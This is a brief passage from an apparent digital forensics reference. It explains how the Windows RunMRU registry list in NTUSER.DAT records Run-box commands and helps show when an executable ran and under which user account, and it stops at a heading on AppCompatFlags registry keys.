The RunMRU is a list of all commands typed into the Run box on the Start menu and is recorded within the NTUSER.DAT associated with each user. Commands referencing executables can be used to determine if, how and when the executable was run, and which user account was associated with running it.


AppCompatFlags Registry Keys